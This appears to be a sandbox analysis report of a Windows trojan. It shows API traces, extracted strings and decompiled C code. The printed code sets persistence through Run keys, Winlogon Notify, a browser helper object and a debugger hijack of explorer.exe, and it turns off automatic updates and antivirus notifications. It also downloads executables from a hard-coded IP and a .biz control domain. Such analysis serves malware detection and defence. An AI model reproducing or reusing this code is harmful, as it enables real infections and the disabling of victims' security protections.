0x00000000
0x00402d6b
0x00402d3e
0x00402d43
0x00402d49
0x00000000
0x00402d49
0x00402da7
0x00402db3
0x00402db5
0x00402dbd
0x00402dc5
0x00402dc5
0x00402dd7
0x00402de7
0x00402dec
0x00402df2
0x00402df8
0x00402e07
0x00402e1b
0x00402e27
0x00402e2c
0x00402e32
0x00402e35
0x00000000
0x00000000
0x00402e49
0x00402e55
0x00402e60
0x00402e63
0x00000000
0x00000000
0x00402e6e
0x00402e73
0x00402e79
0x00402e7f
0x00402e86
0x00402e86
0x00402e89
0x00402e8f
0x00402e95
0x00402ea1
0x00402ea6
0x00402eac
0x00402eaf
0x00000000
0x00000000
0x00402eb7
0x00402ec2
0x00402ec8
0x00402ecf
0x00402ed2
0x00402ed4
0x00402ed7
0x00402edc
0x00402ede
0x00402ee0
0x00402efe
0x00402f12
0x00402f1a
0x00402f20
0x00402f20
0x00402f25
0x00402f25
0x00402f27
0x00402f44
0x00402f44
0x00402f44
0x00402f47
0x00402f48
0x00402f48
0x00402f4c
0x00402f5e
0x00402f60
0x00402f63
0x00402f65
0x00402f6e
0x00000000
0x00402f6e
0x00402f29
0x00402f2b
0x00402f2b
0x00402f2b
0x00402f2c
0x00000000
0x00000000
0x00402f2e
0x00402f31
0x00402f32
0x00402f34
0x00402f35
0x00402f37
0x00000000
0x00000000
0x00402f39
0x00402f3b
0x00000000
0x00000000
0x00000000
0x00402f3b
0x00402f3d
0x00402f3f
0x00402f41
0x00402f41
0x00000000
0x00402f3f
0x00402ee2
0x00402ee2
0x00402ee3
0x00402ee3
0x00402ee9
0x00402eea
0x00402eee
0x00402ef0
0x00402ef3
0x00402ef8
0x00402efa
0x00402efa
0x00000000
0x00402f71
0x00402f71
0x00402f77
0x00402f7d
0x00402f7d
0x00402f8c
0x00402fa3
0x00402fae
0x00402fbe
0x00402fd1
0x00402fd7
0x00402fe3
0x00402fe8
0x00402fea
0x00000000
0x00000000
0x00402ff0
0x00402ff3
0x00000000
0x00000000
0x00402ff9
0x00402ffc
0x00402ffe
0x00403000
0x00403002
0x00403005
0x0040300a
0x0040300a
0x00403011
0x00000000
0x00402dfa
0x00402dfa
0x00402e01
0x00000000
0x00000000
0x00000000
0x00402e01
0x00402df8
0x00402ced
0x00402cf3
0x00402cf3
0x00402cf9
0x00402cfa
0x00402cfa
0x00000000
0x00402cf3
0x00000000
0x00402b65
0x00402b45
0x00402b48
0x00000000
0x00000000
0x00000000
0x00402b4e
0x00402b41
0x00000000
0x00000000
0x00000000
0x004029e4
0x004029e4
0x004029e4
0x004029e7
0x004029e8
0x004029ef
0x004029f2
0x004029fd
0x00402a00
0x00402a01
0x00402a07
0x00402a07
0x00000000
0x004029e4
0x004030c3
0x004030c3
0x004030c7
0x004030d4
0x004030d4
0x00402791
0x00402722
0x004026f3
0x004026fa
0x00000000
0x00000000
0x00000000

APIs

RegCreateKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,00408778,?,00000000), ref: 0040268E
RegCreateKeyExA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,00408778,?,00000000,80000002,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,00408778), ref: 004026C4
RegQueryValueExA.ADVAPI32(?,Default Flags,00000000,00000000,00412190,00000012,80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,00408778,?,00000000,80000002), ref: 004026F3
RegQueryValueExA.ADVAPI32(?,Default Flags,00000000,00000000,00412190,00000012,80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,00408778,?,00000000,80000002), ref: 0040271B
GetSystemTimeAsFileTime.KERNEL32(00412190,?,Default Flags,00000000,00000000,00412190,00000012,80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,00408778,?,00000000), ref: 00402733
RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412190,00000012,00412190,?,Default Flags,00000000,00000000,00412190,00000012,80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000), ref: 00402766
RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412190,00000012,00412190,?,Default Flags,00000000,00000000,00412190,00000012,80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000), ref: 00402781
GetIpAddrTable.IPHLPAPI(00000000,00000012,00000000,00001388,?,Default Flags,00000000,00000003,00412190,00000012,?,Default Flags,00000000,00000003,00412190,00000012), ref: 004027BC
GetIpAddrTable.IPHLPAPI(?,00000012,00000000), ref: 004027E0
wsprintfA.USER32 ref: 0040281B
lstrlen.KERNEL32(?,?,%u.%u.%u.%s,00412104,00000000,000F003F,00408778,?,00000000), ref: 00402821

Part of subcall function 004010B2: wsprintfA.USER32 ref: 004010C5

lstrcpy.KERNEL32(?,?), ref: 00402954
wsprintfA.USER32 ref: 004029C1
wsprintfA.USER32 ref: 004029F2
ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00408778,?,00000000), ref: 00402A31
InternetReadFile.WININET(?,?,00000100,00000000), ref: 00402A51
GetSystemTimeAsFileTime.KERNEL32(00412190,?,?,?,?,?,?,?,?,?,?,?,00408778,?,00000000), ref: 00402AF7
RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412190,00000012,00412190,?,?,?), ref: 00402B17
RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412190,00000012,00412190,?,?,?), ref: 00402B32
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00408778,?,00000000), ref: 00403022

Part of subcall function 00401625: select.WS2_32(00000000,?,00000000,00000000,?), ref: 004016A3
Part of subcall function 00401625: recv.WS2_32(00000000,?,?,00000002), ref: 004016B3
Part of subcall function 00401625: recv.WS2_32(00000000,?,00000001,00000000), ref: 004016D2

RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,000F003F,00000000,?,00000000,?,Default Flags,00000000,00000003,00412190,00000012,00412190), ref: 00402C40
RegSetValueExA.ADVAPI32(?,g00d d0gg,00000000,00000004,?,00000004,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,000F003F,00000000,?,00000000,?), ref: 00402C6F
RegCloseKey.ADVAPI32(?,?,g00d d0gg,00000000,00000004,?,00000004,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C7A
RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412190,00000012,?,Default Flags,00000000,00000003,00412190,00000012,00412190,?,?,?), ref: 00402CA9
RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412190,00000012,?,Default Flags,00000000,00000003,00412190,00000012,00412190,?,?,?), ref: 00402CC4
Sleep.KERNEL32(00001388,?,Default Flags,00000000,00000003,00412190,00000012,?,Default Flags,00000000,00000003,00412190,00000012,00412190,?,?), ref: 00402CCE
RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412190,00000012,?,?,?,?), ref: 004030A3
RegSetValueExA.ADVAPI32(?,Default Flags,00000000,00000003,00412190,00000012,?,?,?,?), ref: 004030BE
Sleep.KERNEL32(-000927C0,?,Default Flags,00000000,00000000,00412190,00000012,80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy,00000000,00000000,00000000,000F003F,00408778,?,00000000), ref: 004030D4

Part of subcall function 0040211B: lstrcpy.KERNEL32(?,?), ref: 00402158
Part of subcall function 0040211B: GetTempPathA.KERNEL32(00000104,?,?,?,?,00000000,?,00000000,?,00402C02,00000000,00000000,?,Default Flags,00000000,00000003), ref: 004021E0
Part of subcall function 0040211B: lstrcpy.KERNEL32(?,?), ref: 00402204
Part of subcall function 0040211B: lstrcat.KERNEL32(00000000,?), ref: 0040220A
Part of subcall function 0040211B: lstrcat.KERNEL32(00000000,00000000), ref: 00402210
Part of subcall function 0040211B: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,tmp,00000000,?), ref: 0040223F

Strings

, xrefs: 00402CD8
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced, xrefs: 00402C36
g00d d0gg, xrefs: 00402C5A
%u.%u.%u.%s, xrefs: 00402815
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy, xrefs: 00402684, 004026BA
%02X, xrefs: 004029E9
Default Flags, xrefs: 004026ED, 00402710, 00402760, 00402776, 00402B11, 00402B27, 00402CA3, 00402CB9, 0040309D, 004030B3
http://%s.biz/d/N?, xrefs: 004029B5
, xrefs: 00402AA0

Memory Dump Source

Source File: 00000001.00000002.580833251.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.580816156.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580871014.0000000000407000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580943075.0000000000411000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580963018.0000000000412000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.580985583.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581001103.0000000000416000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.581020455.0000000000417000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_olfopeh-outix.jbxd

Similarity

API ID: Value$Time$File$Createwsprintf$Systemlstrcpy$AddrQuerySleepTablelstrcatrecv$CloseExitInternetPathProcessReadTemplstrlenselect
String ID: $ $%02X$%u.%u.%u.%s$Default Flags$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced$Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connection Policy$g00d d0gg$http://%s.biz/d/N?
API String ID: 4185374676-436875747
Opcode ID: 92c3a28bd296f806fc015b8eb1c935618ed85b9cc95c8b85cbfaf6c658cedd94
Instruction ID: 63bb0bbfe7c7d9cc37ae593e8b74d1bfbeffdf0d9e5c753dd1b0217088644f60
Opcode Fuzzy Hash: 92c3a28bd296f806fc015b8eb1c935618ed85b9cc95c8b85cbfaf6c658cedd94
Instruction Fuzzy Hash: 9252B330A443159ADB30DB25CD8AB9A77B4AB04704F2081FAE549FB2D1D7B99E84CF5C

Uniqueness

Uniqueness Score: -1.00%

Function 00404DB4 Relevance: 65.0, APIs: 30, Strings: 7, Instructions: 228
registryfilestringCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00404DB4(char _a3, int _a4, int _a8, void* _a12, char _a20, struct _SECURITY_ATTRIBUTES* _a24, char _a30, char _a31, int _a32, struct _SECURITY_ATTRIBUTES* _a36, struct _SECURITY_ATTRIBUTES* _a40, int _a44, struct _SECURITY_ATTRIBUTES* _a48, struct _SECURITY_ATTRIBUTES* _a52, void* _a56, int _a64, int _a68, struct _FILETIME _a92, void* _a96, struct _FILETIME _a100, void* _a104, struct _FILETIME _a108, void* _a112, long _a116, void* _a120, long _a124, void* _a128, int _a136, int _a144, long _a156, void* _a160, char _a1417, char _a1450, char _a1920, signed char _a1976, char _a1977, char _a2530, char _a3284, char _a3296, char _a3304, char _a3312, char _a3552, char _a3576, char _a3584, char _a3592, char _a3608, char _a3828, char _a4100, char _a4612, char _a5424, char _a5428, char _a5432) {
				intOrPtr _v0;
				struct _SECURITY_ATTRIBUTES* _v4;
				int _v8;
				int _v12;
				int _v20;
				CHAR* _t175;
				int _t177;
				long _t178;
				CHAR* _t179;
				int _t181;
				long _t182;
				CHAR* _t187;
				void* _t189;
				CHAR* _t190;
				void* _t192;
				signed char* _t202;
				int _t203;
				void* _t206;
				signed char* _t208;
				int _t211;
				int _t212;
				int _t218;
				int _t219;
				int _t224;
				int _t229;
				int _t231;
				void* _t233;
				int _t237;
				void* _t239;
				int _t244;
				long _t248;
				int _t249;
				int _t255;
				int _t257;
				int _t260;
				int _t267;
				int _t269;
				int _t271;
				int _t276;
				int _t279;
				int _t281;
				int _t284;
				int _t286;
				char _t290;
				int _t295;
				int _t297;
				int _t299;
				struct _SECURITY_ATTRIBUTES* _t303;
				void* _t304;
				void* _t306;
				signed char* _t307;
				signed char* _t308;
				int _t309;
				signed char* _t310;
				signed char* _t311;
				signed char* _t312;
				signed char* _t313;
				signed char* _t314;
				int _t315;
				signed char* _t316;
				int _t317;
				char* _t319;
				CHAR* _t320;
				int _t324;
				int _t326;
				int _t329;
				void* _t343;
				int _t344;
				long _t347;
				CHAR* _t353;
				int _t355;
				long _t356;
				int _t361;
				void* _t370;
				signed char _t378;
				CHAR* _t379;
				CHAR* _t380;
				CHAR* _t381;
				CHAR* _t382;
				CHAR* _t383;
				CHAR* _t384;
				char* _t385;
				void** _t386;
				char* _t387;
				char* _t388;
				CHAR* _t389;
				int _t392;
				char* _t393;
				char* _t395;
				char* _t396;
				char* _t397;
				char* _t398;
				char* _t402;
				void* _t403;
				signed int* _t427;
				char* _t428;
				int _t431;
				void** _t433;
				char* _t434;
				CHAR* _t435;
				signed char* _t436;
				long _t437;
				struct _FILETIME* _t438;
				long* _t439;

				if(GetTempPathA(0x104, ??) == 0) {
					L7:
					E00401029(_a20);
					_t380 =  &_a3608;
					_t175 = GetSystemDirectoryA(_t380, 0x104);
					_push(0x80);
					_push( *0x4120c0);
					_push(0x41103e);
					_push(_t380);
					L00405E30();
					L00405E30();
					SetFileAttributesA(_t175, _t175); // executed
					_t177 = CreateFileA(_t380, 0x40000000, 0, 0, 2, 0x80, 0); // executed
					_a144 = _t177;
					__eflags = _t177;
					if(_t177 == 0) {
						L14:
						_t178 = GetLastError();
						__eflags = _t178 - 0x20;
						if(_t178 != 0x20) {
							_t381 =  &_a3592;
							_t179 = ExpandEnvironmentStringsA("%AppData%\\", _t381, 0x104);
							_push(0x80);
							_push( *0x4120c0);
							L00405E30();
							SetFileAttributesA(_t179, _t381);
							_t181 = CreateFileA(_t381, 0x40000000, 0, 0, 2, 0x80, 0);
							_a136 = _t181;
							__eflags = _t181;
							if(_t181 == 0) {
								L18:
								_t182 = GetLastError();
								__eflags = _t182 - 0x20;
								if(_t182 == 0x20) {
									goto L15;
								}
								_t353 = GetTempPathA(0x104, _t381);
								_push(0x80);
								_push( *0x4120c0);
								L00405E30();
								SetFileAttributesA(_t353, _t381);
								_t355 = CreateFileA(_t381, 0x40000000, 0, 0, 2, 0x80, 0);
								_a128 = _t355;
								__eflags = _t355;
								if(_t355 == 0) {
									L21:
									_t356 = GetLastError();
									__eflags = _t356 - 0x20;
									if(_t356 == 0x20) {
										goto L15;
									} else {
										L24:
										_t382 =  &_a3312;
										_t187 = ExpandEnvironmentStringsA("%AppData%\\", _t382, 0x104);
										_push(0x80);
										_push( *0x4120d0);
										L00405E30();
										SetFileAttributesA(_t187, _t382); // executed
										_t189 = CreateFileA(_t382, 0x40000000, 0, 0, 2, 0x80, 0); // executed
										_a128 = _t189;
										__eflags = _t189;
										_t403 = _t189;
										if(_t189 == 0) {
											L26:
											_t383 =  &_a3304;
											_t190 = GetTempPathA(0x104, _t383);
											_push(0x80);
											_push( *0x4120d0);
											L00405E30();
											SetFileAttributesA(_t190, _t383);
											_t192 = CreateFileA(_t383, 0x40000000, 0, 0, 2, 0x80, 0);
											_a120 = _t192;
											__eflags = _t192;
											_t403 = _t192;
											if(_t192 == 0) {
												L29:
												_a3296 = 0;
												L30:
												__eflags = _a3296;
												if(_a3296 != 0) {
													CreateFileA( &_a3296, 0x80000000, 1, 0, 3, 0, 0); // executed
												}
												_t384 =  &_a128;
												GetSystemDirectoryA(_t384, 0x104);
												_push(0x41103e);
												_push(_t384);
												L00405E30();
												E004012C2(_t384);
												ExpandEnvironmentStringsA("%CommonProgramFiles%\\System\\", _t384, 0x104);
												E004012C2(_t384);
												ExpandEnvironmentStringsA("%AppData%\\", _t384, 0x104);
												E004012C2(_t384);
												_t202 = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
												L33:
												__eflags = _t202 - 0x40724d;
												if(_t202 < 0x40724d) {
													 *_t202 =  *_t202 ^ 0x000000d4;
													_t202 =  &(_t202[1]);
													goto L33;
												}
												_t203 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006,  &_a104); // executed
												__eflags = _t203;
												if(_t203 == 0) {
													L37:
													__eflags = _v4;
													if(_v4 == 0) {
														_t397 =  &_a5432;
														_t343 = E00401251(_a104);
														_push(_t397);
														L00405E40();
														_t344 = _t343 + 1;
														__eflags = _t344;
														RegSetValueExA(_a100.dwLowDateTime,  *0x4120b0, 0, 1, _t397, _t344);
													}
													RegDeleteValueA(_a104, "winrnt.exe"); // executed
													RegCloseKey(_a104); // executed
													L40:
													__eflags =  *0x412100 - 2;
													if( *0x412100 != 2) {
														L80:
														_t206 = CreateThread(0, 0x10000, E0040265F, 2, 0,  &_a108); // executed
														CloseHandle(_t206);
														_t208 = "sOfTwaRe\\mIcRoSofT\\cOdE SToRe dAtAbAsE\\Distribution Units\\{BA168755-D1D0-B2E2-F2AB-FE41DD2CB2AB}";
														while(1) {
															__eflags = _t208 - 0x407060;
															if(_t208 >= 0x407060) {
																break;
															}
															 *_t208 =  *_t208 ^ 0x000000d4;
															_t208 =  &(_t208[1]);
														}
														_v4 = 0;
														while(1) {
															E004011CF(0x80000002, "sOfTwaRe\\mIcRoSofT\\cOdE SToRe dAtAbAsE\\Distribution Units\\{BA168755-D1D0-B2E2-F2AB-FE41DD2CB2AB}");
															__eflags = _v4 - 9;
															if(_v4 <= 9) {
																goto L119;
															}
															_a36 = 0;
															_a40 = 0;
															_t267 = E004025C3();
															__eflags = _t267;
															if(_t267 != 0) {
																L116:
																 *_t439 = 0;
																L120:
																_v0 = 0x3b;
																do {
																	__eflags = _a3284;
																	if(_a3284 != 0) {
																		_push(0);
																		_push("opera.exe");
																		_push("seamonkey.exe");
																		_push("mozilla.exe");
																		_push("firefox.exe");
																		_push("iexplore.exe");
																		_push("explorer.exe");
																		E0040318D( &_a3284);
																		_t439 =  &(_t439[8]);
																	}
																	__eflags = _v12;
																	if(_v12 != 0) {
																		_t388 =  &_a3828;
																		SetFileAttributesA(_t388, 0x21); // executed
																		_t244 = RegCreateKeyA(0x80000002,  &_a4100,  &_a100); // executed
																		__eflags = _t244;
																		if(_t244 == 0) {
																			E00401251(_a100.dwLowDateTime);
																			_a104 = 1;
																			_t248 = RegSetValueExA(_a100.dwLowDateTime, "IsInstalled", 0, 4,  &_a104, 4); // executed
																			_push(_t388);
																			L00405E40();
																			_t249 = _t248 + 1;
																			__eflags = _t249;
																			RegSetValueExA(_a96, "StubPath", 0, 1, _t388, _t249); // executed
																			RegCloseKey(_a96); // executed
																		}
																	}
																	__eflags = _v8;
																	_t429 =  &_a100;
																	if(_v8 == 0) {
																		_t211 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006, _t429);
																		__eflags = _t211;
																		if(_t211 == 0) {
																			L131:
																			_t385 =  &_a5428;
																			_push(_t385);
																			L00405E40();
																			_t212 = _t211 + 1;
																			__eflags = _t212;
																			_push(_t212);
																			_push(_t385);
																			_push(1);
																			_push(0);
																			_push( *0x4120b0);
																			goto L132;
																		}
																		_t211 = RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, 0x20006, _t429);
																		__eflags = _t211;
																		if(_t211 != 0) {
																			goto L133;
																		}
																		goto L131;
																	} else {
																		_t389 =  &_a4612;
																		SetFileAttributesA(_t389, 0x21); // executed
																		_t218 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\explorer.exe",  &_a100); // executed
																		__eflags = _t218;
																		if(_t218 != 0) {
																			L133:
																			__eflags = _v20;
																			if(_v20 == 0) {
																				goto L143;
																			}
																			_t386 =  &_a96;
																			_t219 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t386, 0); // executed
																			__eflags = _t219;
																			if(_t219 == 0) {
																				L136:
																				RegSetValueExA(_a96, "SubshellState", 0, 3,  &_a1920, 0x22a); // executed
																				RegCloseKey(_a96); // executed
																				L137:
																				_t387 =  &_a3552;
																				SetFileAttributesA(_t387, 0x21); // executed
																				__eflags =  *0x412100 - 2;
																				_t432 =  &_a96;
																				if( *0x412100 != 2) {
																					_t224 = RegCreateKeyA(0x80000000, "CLSID\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\\InProcServer32", _t432);
																					__eflags = _t224;
																					if(_t224 != 0) {
																						goto L143;
																					}
																					_push(_t387);
																					L00405E40();
																					RegSetValueExA(_a92.dwLowDateTime, 0, 0, 1, _t387, _t224 + 1);
																					RegSetValueExA(_a92.dwLowDateTime, "ThreadingModel", 0, 1, "Both", 5);
																					RegCloseKey(_a92.dwLowDateTime);
																					_t229 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}", _t432);
																					__eflags = _t229;
																					if(_t229 != 0) {
																						goto L143;
																					}
																					L142:
																					RegCloseKey(_a92.dwLowDateTime); // executed
																					goto L143;
																				}
																				_t231 = RegCreateKeyA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}",  &_a96); // executed
																				__eflags = _t231;
																				if(_t231 != 0) {
																					goto L143;
																				}
																				_t233 = E00401251(_a96);
																				_push(_t387);
																				L00405E40();
																				RegSetValueExA(_a92.dwLowDateTime, "DLLName", 0, 1, _t387, _t233 + 1); // executed
																				RegSetValueExA(_a92, "Startup", 0, 1, "Startup", 8); // executed
																				goto L142;
																			}
																			_t237 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0x408778, _t386, 0);
																			__eflags = _t237;
																			if(_t237 != 0) {
																				goto L137;
																			}
																			goto L136;
																		}
																		_t239 = E00401251(_a100);
																		_push(_t389);
																		L00405E40();
																		_push(_t239 + 1);
																		_push(_t389);
																		_push(1);
																		_push(0);
																		_push("Debugger");
																		L132:
																		RegSetValueExA(_a96, ??, ??, ??, ??, ??); // executed
																		RegCloseKey(_a96); // executed
																		goto L133;
																	}
																	L143:
																	SetFileAttributesA( &_a5424, 0x21); // executed
																	Sleep(0x3e8); // executed
																	_t159 =  &_v4;
																	 *_t159 = _v4 - 1;
																	__eflags =  *_t159;
																} while ( *_t159 >= 0);
																_t255 = RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0xf003f, 0,  &_a12, 0);
																__eflags = _t255;
																if(_t255 == 0) {
																	_a8 = 4;
																	_t393 =  &_a4;
																	_t257 = RegQueryValueExA(_a12, "g00d d0gg", 0, 0, _t393,  &_a8);
																	__eflags = _t257;
																	if(_t257 == 0) {
																		_t260 = _a4 - 1;
																		__eflags = _t260;
																		_a4 = _t260;
																		if(_t260 == 0) {
																			RegDeleteValueA(_a12, "g00d d0gg");
																			Sleep(0x1388);
																			__eflags =  *0x412100 - 2;
																			if( *0x412100 != 2) {
																				ExitWindowsEx(6, 0);
																			} else {
																				RtlAdjustPrivilege(0x13, 1, 0,  &_a3);
																				 *0x412240(1);
																			}
																		} else {
																			RegSetValueExA(_a12, "g00d d0gg", 0, 4, _t393, 4);
																		}
																	}
																	RegCloseKey(_a12);
																}
																continue;
															}
															_t269 = RegCreateKeyExA(0x80000001, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced", 0, 0, 0, 0x2001f, 0,  &_a56, 0);
															__eflags = _t269;
															if(_t269 != 0) {
																__eflags =  *_t439;
																if( *_t439 == 0) {
																	goto L120;
																}
																L118:
																_v4 = 0;
																goto L120;
															}
															_t438 =  &_a48;
															GetSystemTimeAsFileTime(_t438);
															_a44 = 8;
															_t428 =  &_a36;
															_t271 = RegQueryValueExA(_a56, "ConnPred", 0,  &_a32, _t428,  &_a44);
															__eflags = _t271;
															if(_t271 != 0) {
																L89:
																__eflags = E004014D8(_t438, 0x412070) - 0x4af;
																if(__eflags <= 0) {
																	L100:
																	__eflags =  *0x412080;
																	if( *0x412080 == 0) {
																		L103:
																		_a44 = 8;
																		__eflags = RegQueryValueExA(_a56, "UseExtProfile", 0,  &_a32, _t428,  &_a44);
																		if(__eflags != 0) {
																			L105:
																			_t276 = E00402427(__eflags);
																			__eflags = _t276;
																			if(_t276 != 0) {
																				L115:
																				RegCloseKey(_a56);
																				goto L116;
																			}
																			_push(1);
																			_push(0);
																			_t279 = E0040211B("http://69.50.173.166/gdnOT2424.exe", 0);
																			__eflags = _t279;
																			if(_t279 == 0) {
																				L108:
																				_a44 = 8;
																				_t391 =  &_a20;
																				_t281 = RegQueryValueExA(_a56, "UseDflProfile", 0,  &_a32,  &_a20,  &_a44);
																				__eflags = _t281;
																				if(_t281 != 0) {
																					_t290 = _a36 + 0x1162f100;
																					__eflags = _t290;
																					asm("adc edx, 0xffffff9b");
																					_a20 = _t290;
																					_a24 = _a40;
																				}
																				__eflags = E004014D8( &_a48, _t391) - 0x152ab;
																				if(__eflags <= 0) {
																					goto L115;
																				} else {
																					_t284 = E00402427(__eflags);
																					__eflags = _t284;
																					if(_t284 != 0) {
																						goto L115;
																					}
																					_push(3);
																					_push(0);
																					_t286 = E0040211B("tombul.gif", 0);
																					__eflags = _t286;
																					if(_t286 == 0) {
																						goto L115;
																					}
																					_push(8);
																					_push(_t438);
																					_push(0xb);
																					_push(0);
																					_push("UseDflProfile");
																					L114:
																					RegSetValueExA(_a56, ??, ??, ??, ??, ??);
																					RegCloseKey(_a56);
																					 *_t439 = 1;
																					goto L118;
																				}
																			}
																			_a36 = _a48;
																			_a40 = _a52;
																			_push(8);
																			_push(_t438);
																			_push(0xb);
																			_push(0);
																			_push("UseExtProfile");
																			goto L114;
																		}
																		__eflags = E004014D8( &_a48,  &_a36) - 0x152ab;
																		if(__eflags <= 0) {
																			goto L108;
																		}
																		goto L105;
																	}
																	_push(3);
																	_push(0);
																	_t295 = E0040211B("grazie.gif", 0);
																	__eflags = _t295;
																	if(_t295 == 0) {
																		goto L103;
																	}
																	_a36 = _a48;
																	_a40 = _a52;
																	_push(8);
																	_push(_t438);
																	_push(0xb);
																	_push(0);
																	_push("ConnPred");
																	goto L114;
																}
																_t297 = E00402427(__eflags);
																__eflags = _t297;
																if(_t297 != 0) {
																	goto L115;
																}
																_t299 = E004019E8("http://utbidet-ugeas.biz/d/cc", 0, 1);
																_t431 = 0;
																__eflags = _t299;
																_t392 = _t299;
																if(_t299 != 0) {
																	_t304 = E00401E00(_t299,  &_a30, 2);
																	__eflags = _t304 - 2;
																	if(_t304 == 2) {
																		_t431 = 1;
																	}
																}
																E00401F59(_t392);
																__eflags = _t431;
																if(_t431 == 0) {
																	 *0x412080 = 0;
																} else {
																	 *0x412070 = _a48;
																	_t303 = 0;
																	__eflags = _a30 - 0x49;
																	 *0x412074 = _a52;
																	if(_a30 == 0x49) {
																		__eflags = _a31 - 0x54;
																		if(_a31 == 0x54) {
																			_t303 = 1;
																		}
																	}
																	 *0x412080 = _t303;
																}
																goto L100;
															}
															_t306 = E004014D8(_t438, _t428);
															__eflags = _t306 - 0x152ab;
															if(_t306 <= 0x152ab) {
																goto L103;
															}
															goto L89;
															L119:
															_t122 =  &_v4;
															 *_t122 =  &(_v4->nLength);
															__eflags =  *_t122;
															goto L120;
														}
													}
													_t307 = "SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU";
													while(1) {
														__eflags = _t307 - 0x407214;
														if(_t307 >= 0x407214) {
															break;
														}
														 *_t307 =  *_t307 ^ 0x000000d4;
														_t307 =  &(_t307[1]);
													}
													_t308 = "NoAutoUpdate";
													while(1) {
														__eflags = _t308 - 0x4071cf;
														if(_t308 >= 0x4071cf) {
															break;
														}
														 *_t308 =  *_t308 ^ 0x000000d4;
														_t308 =  &(_t308[1]);
													}
													_t433 =  &_a104;
													_t309 = RegCreateKeyA(0x80000002, "SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU", _t433); // executed
													__eflags = _t309;
													if(_t309 == 0) {
														RegSetValueExA(_a104, "NoAutoUpdate", 0, 4,  &_a108, 4); // executed
														RegCloseKey(_a104);
													}
													_t310 = "SOFTWARE\\Microsoft\\Security Center";
													while(1) {
														__eflags = _t310 - 0x4071c2;
														if(_t310 >= 0x4071c2) {
															break;
														}
														 *_t310 =  *_t310 ^ 0x000000d4;
														_t310 =  &(_t310[1]);
													}
													_t311 = "AntiVirusOverride";
													while(1) {
														__eflags = _t311 - 0x407188;
														if(_t311 >= 0x407188) {
															break;
														}
														 *_t311 =  *_t311 ^ 0x000000d4;
														_t311 =  &(_t311[1]);
													}
													_t312 = "AntiVirusDisableNotify";
													while(1) {
														__eflags = _t312 - 0x407176;
														if(_t312 >= 0x407176) {
															break;
														}
